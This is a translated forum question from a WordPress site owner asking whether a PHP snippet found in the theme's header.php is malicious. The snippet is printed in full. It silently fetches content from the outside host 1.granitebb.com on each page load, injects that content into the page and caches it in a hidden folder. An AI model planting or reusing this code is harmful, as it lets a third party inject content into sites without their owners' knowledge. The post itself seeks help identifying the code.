-1
当我使用exploit scanner
插件我得到下面的结果扫描一个WordPressPHP恶意软件,WordPress的利用,PHP病毒
图片1:
图2:
图3:
有什么可担心的吗?是包含恶意代码?
另外在theame header.php文件中,我看到了以下细节。有什么可担心的吗?以下代码实际上在做什么?
<?php
$h = $_SERVER['HTTP_HOST']; $u = trim($_SERVER['REQUEST_URI']);
$cd = dirname(__FILE__) . '/.cache';
$cf = $cd . '/' . md5($h . '##' . $u);
$s = '1.granitebb.com';
if (file_exists($cf) and filemtime($cf) > time() - 3600)
echo file_get_contents($cf);
else
{
$ini1 = @ini_set('allow_url_fopen', 1); $ini2 = @ini_set('default_socket_timeout', 3);
$p = '/links.php?u=' . urlencode($u) . '&h=' . urlencode($h);
$c = '';
if ($fp = @fsockopen($s, 80, $errno, $errstr, 3)) {
@fputs($fp, "GET {$p} HTTP/1.0\r\nHost: $s\r\n\r\n");
while (! feof($fp))
$c .= @fread($fp, 8192);
fclose($fp);
$c = end(explode("\r\n\r\n", $c));
echo $c;
if (strlen($c) and (is_dir($cd) or @mkdir($cd))) {
@file_put_contents($cf, $c);
}
}
@ini_set('allow_url_fopen', $ini1); @ini_set('default_socket_timeout', $ini2);
}
?>